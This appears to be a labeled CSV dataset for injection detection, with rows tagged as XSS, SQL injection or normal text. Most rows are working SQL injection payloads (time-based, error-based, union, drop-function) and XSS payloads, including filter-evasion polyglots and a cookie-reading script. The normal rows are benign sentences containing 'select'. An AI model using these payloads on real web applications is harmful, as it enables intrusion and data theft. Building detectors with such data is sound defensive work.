7645 from information_schema.character_sets ) end ) #,2,SQLi,13243 "<SCRIPT SRC=""http://.rocks/.jpg""></SCRIPT>",1,XSS,7478 "?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=",1,XSS,2554 <strong onpointerleave=alert(1)>XSS</strong>,1,XSS,6978 <slot onpointerup=alert(1)>XSS</slot>,1,XSS,8654 select pg_sleep ( 5 ) and ( 1044 = 1044,2,SQLi,19611 "<style>@keyframes x{}</style><dfn style=""animation-name:x"" onanimationstart=""alert(1)""></dfn>",1,XSS,1667 1%' ) and sleep ( 5 ) #,2,SQLi,21334 <td onblur=alert(1) tabindex=1 id=x></td><input autofocus>,1,XSS,3839 They select top candidates.,3,normal,24439 <rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus>,1,XSS,2584 "<div draggable=""true"" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section>",1,XSS,804 "<s onmousedown=""alert(1)"">test</s>",1,XSS,9182 if ( 6767 = 5022 ) select 6767 else drop function buii--,2,SQLi,17722 "<pre onmouseup=""alert(1)"">test</pre>",1,XSS,8919 "1%"" union all select null,null,null,null,null,null,null--",2,SQLi,17550 -3648' where 4629 = 4629 order by 1--,2,SQLi,19930 "-4580"" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""dbhb"" = ""dbhb",2,SQLi,10306 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( 'wmoo' like 'wmoo",2,SQLi,15248 Select your dream.,3,normal,24826 <svg><content onload=alert(1)></content>,1,XSS,7966 "1%' ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( '%' = '",2,SQLi,12901 ") AND =BENCHMARK(5000000,MD5(0x774c5341))--",2,SQLi,19168 Randomly select a song.,3,normal,24267 Where's the remote?,3,normal,23491 "><script+src=https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)""></script>",1,XSS,1813 The best way of deducing r„ is to select portions of the dynamometer record where the speed is constant.,3,normal,25484 "<template onkeyup=""alert(1)"" contenteditable>test</template>",1,XSS,3529 -2756' where 6156 = 6156 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,10007 -6947' ) ) as qqjp where 6700 = 6700 union all select 6700#,2,SQLi,17316 <i onblur=alert(1) tabindex=1 id=x></i><input autofocus>,1,XSS,4297 "<div id=""122""><iframe sandbox=""allow-same-origin allow-forms allow-scripts"" src=""http://example.org/""></iframe>//[""'`-->]]>]</div>",1,XSS,604 "1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""dzse"" = ""dzse",2,SQLi,12324 "<style>:target {color: red;}</style><blink id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></blink>",1,XSS,908 Where's the best place to enjoy the beach?,3,normal,23718 "select * from users where id = '1' union select ||/1,version ( ) -- 1'",2,SQLi,16128 "iif ( 2452 = 8999,1,1/0 )",2,SQLi,21048 "<li draggable=""true"" ondragenter=""alert(1)"">test</li>",1,XSS,5042 1 ) ) as dgso where 4654 = 4654 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10384 "When you select that, green dots float around the object image.",3,normal,25146 "1 ) as nlig where 5964 = 5964 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15043 "<dialog draggable=""true"" ondragstart=""alert(1)"">test</dialog>",1,XSS,3277 "1"" ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( ""hbgr"" like ""hbgr",2,SQLi,10549 "<;IMG SRC="";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"";>;",1,XSS,1762 "In 1850 he became vice-principal and Hebrew lecturer at St David's College, Lampeter, where he introduced muchneeded educational and financial reforms. He was appointed select preacher of Cambridge University in 1854, and preached a sermon on inspiration, afterwards published in his Rational Godliness after the Mind of Christ and the Written Voices of the Church (London, 1855).",3,normal,26023 "{""id"":null,""name"":""gradually touch""}",3,normal,27031 "1 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) # cqqs",2,SQLi,11161 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9",2,SQLi,17226 "1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'rpiz' like 'rpiz",2,SQLi,14191 "1%"" and sleep ( 5 ) #",2,SQLi,21705 "1%' union all select null,null,null,null,null,null--",2,SQLi,18206 "<tbody onbeforecut=""alert(1)"" contenteditable>test</tbody>",1,XSS,3930 ORDER BY 27,2,SQLi,22385 "1' ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13500 <del id=x tabindex=1 onactivate=alert(1)></del>,1,XSS,6109 Merge all the data sources effectively.,3,normal,22896 "<a target=""x"" href=""xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();",1,XSS,45 "1"" ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13880 ")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337",2,SQLi,16126 "1"" where 5477 = 5477",2,SQLi,21843 "1"" ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ""ppml"" = ""ppml",2,SQLi,15274 "<dt onbeforecopy=""alert(1)"" contenteditable>test</dt>",1,XSS,4971 "{""id"":null,""name"":""health""}",3,normal,27098 "1"" where 2309 = 2309 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17488 select sleep ( 5 ) and ( 4863 = 4863,2,SQLi,19984 The Health Care Select Sector SPDR ETF (XLV) jumped 2.943%.,3,normal,25436 Sort results where valid.,3,normal,23322 1%' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and '%' = ',2,SQLi,10627 -6855' ) or 8519 = 9248,2,SQLi,21348 -3304' ) ) order by 1--,2,SQLi,21354 "<style>:target {color: red;}</style><audio id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></audio>",1,XSS,876 "<spacer onmouseover=""alert(1)"">test</spacer>",1,XSS,6880 Boston Dynamics has started leasing Spot out to select clients.,3,normal,26323 "1%"" ) ) ) order by 1#",2,SQLi,21701 "<abbr onclick=""alert(1)"">test</abbr>",1,XSS,8898 "javascript:alert()//--></script></textarea></style></title><a""//' onclick=alert()//>*/alert()/*",1,XSS,1628 "1"" ) as kuuf where 6908 = 6908",2,SQLi,20654 "1"" or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17520 if ( 3392 = 4422 ) select 3392 else drop function xsqq--,2,SQLi,17729 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'osqf' = 'osqf",2,SQLi,13549 Where did you find that charming cafe?,3,normal,23680 "1%' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( '%' = '",2,SQLi,13264 Select your authenticate.,3,normal,25002 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--",2,SQLi,15383 if ( 3831 = 9321 ) select 3831 else drop function ybru--,2,SQLi,17614 <body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus>,1,XSS,2282 <svg><tr onload=alert(1)></tr>,1,XSS,9566 "<div draggable=""true"" contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee>",1,XSS,978 "1 where 2914 = 2914 union all select null,null,null#",2,SQLi,18216 "1%"" ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13667 "<div draggable=""true"" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed>",1,XSS,981 1 where 7254 = 7254,2,SQLi,21992 "<div STYLE=""width: expression(document.vulnerable=true);"">",1,XSS,3821 "{""id"":null,""firstName"":""Kevin"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26939 "1"" ) as hoiv where 9708 = 9708 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11866 or 2 between 1 and 3,2,SQLi,21726 Where's the playground?,3,normal,23539 "<ol onbeforecut=""alert(1)"" contenteditable>test</ol>",1,XSS,5195 "<div draggable=""true"" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map>",1,XSS,1181 "<style>:target {color:red;}</style><strong id=x style=""transition:color 1s"" ontransitionend=alert(1)></strong>",1,XSS,1020 "1"" ) ) as ikuz where 7385 = 7385",2,SQLi,20351 <title onblur=alert(1) tabindex=1 id=x></title><input autofocus>,1,XSS,2957 WAITFOR DELAY '0:0:5',2,SQLi,21574 COM: up to 70 percent off luxury labels Michael Kors: take an extra 25 percent off already reduced prices; through 7/4 M'oda 'Operandi: up to 70 percent off select designer styles; through 73/11 Neil J. Rodgers: 50 percent off sitewide; through 7/5 Of a Kind: 30 percent off select items; through 7/6 Old Navy: up to 50 percent off select items Parker NY: to 70 percent off select items (use code: LUCKYSTARS); through 53/2 Ramy Brook: 25 percent off select styles; through 7/4 Rebecca Taylor: 40 percent off sale items (use code: JULYSURPRISE); through 7/4 Rockport: up to 50 percent off and get 2 pairs of select styles for $753 Schutz: up to 50 percent off select styles Shopbop.,3,normal,26276 "1%' union all select null,null--",2,SQLi,20314 "1"" ) where 9827 = 9827",2,SQLi,21434 "var title = ""<%=Encode.forJavaScript(request.getParameter(""title""))%>"";",1,XSS,2402 "<footer onmousemove=""alert(1)"">test</footer>",1,XSS,6948 /><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />,1,XSS,4648 "javascript:alert()//\"";alert();/*-/*`/*\`/*'/*""/**///--><FRAME SRC=""javascript:alert();""></textarea></style></noscript></noembed></template></option></select></script></title><svg/onload=alert()><svg/onload=alert()> alert(1)//",1,XSS,102 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,14222 1' ) as imgv where 7802 = 7802,2,SQLi,20575 -7273%' ) ) order by 1#,2,SQLi,21360 group by password having 1=1--,2,SQLi,20502 -2241 ) where 7606 = 7606 or ( 8459 = 8459 ) *4906--,2,SQLi,18174 "Berg explained so clearly why he wanted to collect at his house a small but select company, and why this would give him pleasure, and why though he grudged spending money on cards or anything harmful, he was prepared to run into some expense for the sake of good society--that Pierre could not refuse, and promised to come.",3,normal,26328 "<tr onkeypress=""alert(1)"" contenteditable>test</tr>",1,XSS,5427 "<meta http-equiv=""Content-Type"" content=""text/html; charset=UTF-7"" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-",1,XSS,951 "{""id"":null,""firstName"":""Pranava"",""lastName"":""Sheoran"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27362 1 where 8889 = 8889,2,SQLi,21959 "1 ) where 7684 = 7684 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11207 1' ) where 9175 = 9175,2,SQLi,21406 <thead id=x tabindex=1 onfocusin=alert(1)></thead>,1,XSS,5676 1%' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,16819 if ( 4735 = 8907 ) select 4735 else drop function qigo--,2,SQLi,17634 -7452 where 2224 = 2224 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10283 Select a filter for the photo.,3,normal,24022 "<big onpaste=""alert(1)"" contenteditable>test</big>",1,XSS,5606 Where's the hospital?,3,normal,23517 "1' ) as vpop where 2528 = 2528 union all select null,null,null,null,null,null,null#",2,SQLi,15027 "1"" ) ) ) and 7135 = 8805#",2,SQLi,21112 "1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'ichh' like 'ichh",2,SQLi,11443 "1 ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) )",2,SQLi,17986 "-1305 ) or make_set ( 2298 = 5545,5545 ) and ( 6715 = 6715",2,SQLi,17368 "1 ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 3504 = 3504",2,SQLi,12263 It is not recommended to select an ISP by price alone.,3,normal,25966 "{""id"":null,""firstName"":""Renee"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27259 1 and sleep ( 5 ),2,SQLi,22109 "<style>@keyframes slidein {}</style><optgroup style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></optgroup>",1,XSS,323 "<style>@keyframes x{}</style><template style=""animation-name:x"" onanimationstart=""alert(1)""></template>",1,XSS,1336 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,16031 Insert the text.,3,normal,22879 "-3997'+ ( select 'avjk' where 1917 = 1917 union all select 1917,1917,1917--",2,SQLi,15649 <nobr onpointermove=alert(1)>XSS</nobr>,1,XSS,8220 "<a href=""javascript:void(0);"" onclick=""window.open(document.URL, '_blank');"">Open Current URL</a>",1,XSS,1565 1' ) as rbpx where 1264 = 1264,2,SQLi,20523 Let's select a movie.,3,normal,24456 "-2028' ) ) ) union all select 8698,8698,8698,8698#",2,SQLi,18460 "1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and 'pphf' = 'pphf",2,SQLi,12846 "<source ondblclick=""alert(1)"">test</source>",1,XSS,7257 admin' or '1'='1,2,SQLi,22113 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#",2,SQLi,18039 "1' ) as siyk where 1514 = 1514 union all select null,null,null,null,null,null#",2,SQLi,15322 1 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ),2,SQLi,18006 "1' ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'lqpd' = 'lqpd",2,SQLi,14309 "<keygen draggable=""true"" ondrag=""alert(1)"">test</keygen>",1,XSS,4361 I need to select a new recipe to try.,3,normal,23881 Select the perfect angle for the photo.,3,normal,24011 "><script+src=https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)""></script>",1,XSS,950 "-1823 where 6852 = 6852 union all select 6852,6852,6852,6852,6852,6852#",2,SQLi,16074 <link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus>,1,XSS,2324 "1%' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( '%' = '",2,SQLi,14237 "1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ""gvlc"" like ""gvlc",2,SQLi,11754 "With the remote, you can select an app and launch it.",3,normal,25116 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) --",2,SQLi,18527 <details id=x tabindex=1 onfocus=alert(1)></details>,1,XSS,5230 "select * from users where id = 1 or ""%."" or 1 = 1 -- 1",2,SQLi,17864 "<Video> <source onerror = ""javascript: alert ()"">",1,XSS,5777 or username is not NULL or username = ',2,SQLi,19566 Select the best camera settings for shots.,3,normal,24101 -6823' ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 'lwlk' like 'lwlk,2,SQLi,10123 "1%' ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11735 <a onblur=alert(1) tabindex=1 id=x></a><input autofocus>,1,XSS,4229 Where's your SQL role?,3,normal,23434 "{""id"":null,""name"":""height fierce""}",3,normal,27197 select ( case when ( 4935 = 4734 ) then 4935 else 4935* ( select 4935 from mysql.db ) end ) #,2,SQLi,14521 "Click the photo or photos you want to download to your PC. To select several photos, hold the CTRL key while you click to multi-select photos.",3,normal,26280 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",2,SQLi,15461 "1%' ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( '%' = '",2,SQLi,13379 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11907 1' ) where 2763 = 2763,2,SQLi,21418 1' ) as chla where 6098 = 6098,2,SQLi,20661 Please select a venue.,3,normal,24361 "-7146"" where 6431 = 6431 or 8548 = 5549--",2,SQLi,19410 "-9996' or make_set ( 1237 = 7111,7111 )",2,SQLi,19599 "1 ) where 9010 = 9010 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12963 <isindex onpointerenter=alert(1)>XSS</isindex>,1,XSS,6395 "1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) )",2,SQLi,10835 "<rt onbeforecut=""alert(1)"" contenteditable>test</rt>",1,XSS,5122 -7199'|| ( select 'ssty' where 5406 = 5406 order by 1#,2,SQLi,17951 "1'|| ( select 'djoe' from dual where 8063 = 8063 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) ||'",2,SQLi,10055 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></em>",1,XSS,294 <spacer id=x tabindex=1 onfocusin=alert(1)></spacer>,1,XSS,5241 "<input name=""username"" value=""admin"" />",1,XSS,8292 "#goto,javascript:alert(1)"",",1,XSS,9659 <strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus>,1,XSS,2506 Select with confidence.,3,normal,24434 "1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'eimq' = 'eimq",2,SQLi,10395 "1' ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'uadr' like 'uadr",2,SQLi,11388 <figure onpointerout=alert(1)>XSS</figure>,1,XSS,7394 select case when 8975 = 2352 then 1 else null end--,2,SQLi,18306 "select * from users where id = 1 or "" ) @"" or 1 = 1 -- 1",2,SQLi,17591 <video onloadstart=alert(1)><source>,1,XSS,8957 "<mark onmouseout=""alert(1)"">test</mark>",1,XSS,8284 "JavaScript://%250Aalert?.(1)//'/*\'/*""/*\""/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->",1,XSS,112 "{""id"":null,""firstName"":""Vanessa"",""lastName"":""Zhou"",""address"":""2 S 15th St"",""city"":""245"",""telephone"":""5232100278""}",3,normal,27053 Will the Whips try to strangle independence on the new select committees by putting party stooges in as chairs.,3,normal,25122 "1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( ""hiwo"" like ""hiwo",2,SQLi,14834 "<style>@keyframes x{}</style><datalist style=""animation-name:x"" onanimationend=""alert(1)""></datalist>",1,XSS,1419 "1' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( 'ossj' = 'ossj",2,SQLi,15210 "1"" ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ""tfso"" = ""tfso",2,SQLi,10970 "1 ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 4234 = 4234",2,SQLi,11415 "-3037"" ) ) ) or elt ( 4758 = 9129,9129 ) and ( ( ( ""zewv"" like ""zewv",2,SQLi,16403 1' ) ) and 3355 = 6012 and ( ( 'ofmy' = 'ofmy,2,SQLi,19054 "<content oncopy=""alert(1)"" contenteditable>test</content>",1,XSS,4079 <input id=x tabindex=1 onactivate=alert(1)></input>,1,XSS,5358 -2981 ) ) or ( 8459 = 8459 ) *4906 and ( ( 4202 = 4202,2,SQLi,17952 "1 ) ) as ynzg where 1926 = 1926 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10941 ><<script>alert(document.cookie);//<</script>,1,XSS,6563 ORDER BY 24#,2,SQLi,22318 "<spacer draggable=""true"" ondragenter=""alert(1)"">test</spacer>",1,XSS,3351 "1' ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'peyy' = 'peyy",2,SQLi,12545 pg_sleep(__TIME__)--,2,SQLi,21725 "<map onmouseover=""alert(1)"">test</map>",1,XSS,8440 "1' in boolean mode ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) #",2,SQLi,14634 `'><script>\xEF\xBF\xAEjavascript:alert(526)</script>,1,XSS,5065 "1%' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( '%' = '",2,SQLi,10494 1 and sleep 5--,2,SQLi,22163 1'|| ( select 'xdzp' from dual where 5786 = 5786 and ( 3020 = 3020 ) *6703 ) ||',2,SQLi,15187 1'|| ( select 'miew' where 8360 = 8360 waitfor delay '0:0:5' ) ||',2,SQLi,16582 or sleep(__TIME__)=',2,SQLi,21727 "‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,97 "1'|| ( select 'mzhj' where 9677 = 9677 union all select null,null,null--",2,SQLi,16010 "1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 'ayjb' like 'ayjb",2,SQLi,16069 <label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus>,1,XSS,2613 "-6720' ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'enfe' like 'enfe",2,SQLi,10122 "1'+ ( select lhtn where 8484 = 8484 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,11034 Where to find the table?,3,normal,23377 <svg><shadow onload=alert(1)></shadow>,1,XSS,8414 "1"" ) where 5491 = 5491",2,SQLi,21484 "<menu draggable=""true"" ondragstart=""alert(1)"">test</menu>",1,XSS,4157 "1 where 6369 = 6369 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12696 "<blink onmousedown=""alert(1)"">test</blink>",1,XSS,7423 ORDER BY 30--,2,SQLi,22253 "1,row ( 7937,5067 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 7937 = 7937,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x )",2,SQLi,10949 "1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and 'nhmz' like 'nhmz",2,SQLi,12582 "In the drop-down menu, select ""Backup and Restore Games..."" and then select the first checkbox option — ""Backup.""",3,normal,26001 <colgroup onpointermove=alert(1)>XSS</colgroup>,1,XSS,6172 "1' ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 'wbsz' = 'wbsz",2,SQLi,10673 "1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'dreq' = 'dreq",2,SQLi,13987 "1%"" ) ) ) union all select null,null--",2,SQLi,19757 <script>var{a:onerror}={a:alert};throw 1</script>,1,XSS,5705 "1 ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( 7992 = 7992",2,SQLi,12773 Select the movie.,3,normal,22838 "-6772"" ) ) or 9323 = 9323#",2,SQLi,20973 "<rp oncut=""alert(1)"" contenteditable>test</rp>",1,XSS,6459 "<style>@keyframes x{}</style><hr style=""animation-name:x"" onanimationend=""alert(1)""></hr>",1,XSS,1795 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,15000 She chose a workout routine from the fitness app.,3,normal,23928 "The crowds of men who merely spoke the Greek and Latin tongues in the Middle Ages were not entitled by the 